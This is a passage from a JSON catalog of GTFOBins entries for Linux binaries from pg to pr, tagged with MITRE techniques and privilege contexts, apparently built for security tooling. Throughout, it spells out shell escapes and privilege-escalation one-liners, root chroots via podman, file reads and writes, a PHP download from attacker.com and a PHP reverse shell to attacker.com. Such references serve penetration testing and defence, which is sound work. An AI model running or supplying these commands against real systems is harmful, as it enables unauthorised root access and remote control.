Escalation"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:file-read:0:unprivileged","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:shell:0:sudo","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:shell:0:suid","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:shell:0:unprivileged","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:php:command:0:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:0:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:1:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:1:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:1:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:2:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:2:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:2:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:download:0:sudo","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:download:0:suid","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:download:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-read:0:sudo","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-read:0:suid","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-read:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-write:0:sudo","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-write:0:suid","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-write:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:reverse-shell:0:sudo","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:reverse-shell:0:suid","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:reverse-shell:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:0:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:0:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:0:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:1:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:1:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:1:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:1:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:2:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); $h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:2:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:2:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:2:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:3:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:3:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:3:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\", [\"-p\"]);'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:3:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:upload:0:sudo","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:upload:0:suid","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:upload:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:pic:file-read:0:sudo","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:file-read:0:suid","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:file-read:0:unprivileged","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:shell:0:sudo","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:shell:0:suid","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:shell:0:unprivileged","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pidstat:shell:0:sudo","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pidstat/"]},{"id":"gtfo:pidstat:shell:0:suid","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pidstat/"]},{"id":"gtfo:pidstat:shell:0:unprivileged","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pidstat/"]},{"id":"gtfo:pip:inherit:0:sudo","toolId":"gtfo:pip","toolName":"pip","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\npip install --break-system-packages .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```\n\nThe `--break-system-packages` flag can be omitted in older systems.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pip/"]},{"id":"gtfo:pip:inherit:0:unprivileged","toolId":"gtfo:pip","toolName":"pip","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\npip install --break-system-packages .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```\n\nThe `--break-system-packages` flag can be omitted in older systems.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pip/"]},{"id":"gtfo:pip:shell:0:sudo","toolId":"gtfo:pip","toolName":"pip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pip config --editor '/bin/sh -s' edit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pip/"]},{"id":"gtfo:pip:shell:0:unprivileged","toolId":"gtfo:pip","toolName":"pip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pip config --editor '/bin/sh -s' edit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pip/"]},{"id":"gtfo:pipx:inherit:0:sudo","toolId":"gtfo:pipx","toolName":"pipx","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/file.py\npipx run /path/to/file.py","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pipx/"]},{"id":"gtfo:pipx:inherit:0:unprivileged","toolId":"gtfo:pipx","toolName":"pipx","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/file.py\npipx run /path/to/file.py","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pipx/"]},{"id":"gtfo:pkexec:shell:0:sudo","toolId":"gtfo:pkexec","toolName":"pkexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pkexec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pkexec/"]},{"id":"gtfo:pkg:command:0:sudo","toolId":"gtfo:pkg","toolName":"pkg","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"pkg install -y --no-repo-update ./x-1.0.txz","description":"Generate the FreeBSD package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t freebsd -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pkg/"]},{"id":"gtfo:plymouth:shell:0:sudo","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command=/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/plymouth/"]},{"id":"gtfo:plymouth:shell:0:suid","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command='/bin/sh -p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/plymouth/"]},{"id":"gtfo:plymouth:shell:0:unprivileged","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command=/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/plymouth/"]},{"id":"gtfo:podman:shell:0:sudo","toolId":"gtfo:podman","toolName":"podman","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh","description":"This requires an actual image to be available (e.g., `alpine`) downloading it if not present.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/podman/"]},{"id":"gtfo:podman:shell:0:unprivileged","toolId":"gtfo:podman","toolName":"podman","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh","description":"This requires an actual image to be available (e.g., `alpine`) downloading it if not present.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/podman/"]},{"id":"gtfo:poetry:inherit:0:sudo","toolId":"gtfo:poetry","toolName":"poetry","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npoetry run python /path/to/temp-file","description":"This allows to run Python code (`...`).\n\nA valid `pyproject.toml` file must be present in the current working directory, you can create one with `poetry init -n`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/poetry/"]},{"id":"gtfo:poetry:inherit:0:unprivileged","toolId":"gtfo:poetry","toolName":"poetry","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npoetry run python /path/to/temp-file","description":"This allows to run Python code (`...`).\n\nA valid `pyproject.toml` file must be present in the current working directory, you can create one with `poetry init -n`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/poetry/"]},{"id":"gtfo:posh:shell:0:sudo","toolId":"gtfo:posh","toolName":"posh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"posh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/posh/"]},{"id":"gtfo:posh:shell:0:unprivileged","toolId":"gtfo:posh","toolName":"posh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"posh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/posh/"]},{"id":"gtfo:pr:file-read:0:sudo","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pr -T 